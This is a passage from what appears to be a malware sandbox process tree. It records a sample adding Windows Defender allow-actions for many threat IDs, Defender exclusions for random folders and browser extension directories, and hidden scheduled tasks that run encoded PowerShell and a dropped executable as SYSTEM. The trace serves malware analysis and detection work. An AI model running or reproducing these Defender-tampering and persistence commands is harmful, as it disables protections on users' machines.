                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                        5⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Drops file in System32 directory
                                                        • Modifies data under HKEY_USERS
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:808
                                                        • C:\Windows\SysWOW64\gpupdate.exe
                                                          "C:\Windows\system32\gpupdate.exe" /force
                                                          6⤵
                                                            PID:4940
                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                    2⤵
                                                    • Drops file in System32 directory
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:6020
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:1104
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                          4⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1932
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:3036
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:3908
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2296
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                            3⤵
                                                              PID:3016
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:5032
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1548
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4348
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:5200
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:5524
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                3⤵
                                                                  PID:1988
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:5052
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:3604
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                  3⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2980
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:3564
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:5084
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                    3⤵
                                                                      PID:3736
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:1716
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:3384
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                      3⤵
                                                                        PID:1784
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1136
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:216
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:3688
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:428
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:5444
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                              3⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:3840
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:1060
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:1696
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPhKexxKHjU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PPPhKexxKHjU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEIgHLylU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZEIgHLylU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbgYcEcZyQUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\dbgYcEcZyQUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJTkDUsLcXSLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sJTkDUsLcXSLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aiawRKtoMjRxlKVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aiawRKtoMjRxlKVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EfDQwjblbGMYTvUW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\EfDQwjblbGMYTvUW\" /t REG_DWORD /d 0 /reg:64;"
                                                                              2⤵
                                                                              • Drops file in System32 directory
                                                                              • System Location Discovery: System Language Discovery
                                                                              • Modifies data under HKEY_USERS
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              PID:1528
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:32
                                                                                3⤵
                                                                                  PID:5656
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:32
                                                                                    4⤵
                                                                                      PID:3112
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PPPhKexxKHjU2" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5828
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEIgHLylU" /t REG_DWORD /d 0 /reg:32
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2792
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZEIgHLylU" /t REG_DWORD /d 0 /reg:64
                                                                                    3⤵
                                                                                      PID:5260
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:5300
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bCwXtxtDKUofBlvSuKR" /t REG_DWORD /d 0 /reg:64
                                                                                        3⤵
                                                                                          PID:4840
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbgYcEcZyQUn" /t REG_DWORD /d 0 /reg:32
                                                                                          3⤵
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:4524
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dbgYcEcZyQUn" /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:5620
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJTkDUsLcXSLC" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:5504
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sJTkDUsLcXSLC" /t REG_DWORD /d 0 /reg:64
                                                                                              3⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              PID:3320
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aiawRKtoMjRxlKVB /t REG_DWORD /d 0 /reg:32
                                                                                              3⤵
                                                                                                PID:3496
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aiawRKtoMjRxlKVB /t REG_DWORD /d 0 /reg:64
                                                                                                3⤵
                                                                                                • System Location Discovery: System Language Discovery
                                                                                                PID:2492
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                3⤵
                                                                                                  PID:5220
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5808
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                  3⤵
                                                                                                    PID:3128
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                    3⤵
                                                                                                      PID:5060
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR /t REG_DWORD /d 0 /reg:32
                                                                                                      3⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:6072
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DXDwPtThiPwiAENoR /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:5100
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EfDQwjblbGMYTvUW /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4492
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\EfDQwjblbGMYTvUW /t REG_DWORD /d 0 /reg:64
                                                                                                        3⤵
                                                                                                          PID:5016
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /CREATE /TN "gkectzvWA" /SC once /ST 11:26:45 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                        2⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                        PID:4384
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        schtasks /run /I /tn "gkectzvWA"
                                                                                                        2⤵
                                                                                                          PID:5276
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /DELETE /F /TN "gkectzvWA"
                                                                                                          2⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:2120
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /CREATE /TN "HUfdpCtBFdwYOuoar" /SC once /ST 14:49:17 /RU "SYSTEM" /TR "\"C:\Windows\Temp\EfDQwjblbGMYTvUW\iofAWDeBylnRwgX\dPTnSev.exe\" Bn /FNzqdidsO 385107 /S" /V1 /F
                                                                                                          2⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                          PID:4076
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          schtasks /run /I /tn "HUfdpCtBFdwYOuoar"
                                                                                                          2⤵
                                                                                                            PID:6056
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4972 -s 580
                                                                                                            2⤵
                                                                                                            • Program crash
                                                                                                            PID:4600
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                          1⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          PID:6060
                                                                                                          • C:\Windows\system32\gpupdate.exe
                                                                                                            "C:\Windows\system32\gpupdate.exe" /force
                                                                                                            2⤵
                                                                                                              PID:5996
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                                                                            1⤵
                                                                                                              PID:5664
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                              1⤵
                                                                                                                PID:5796
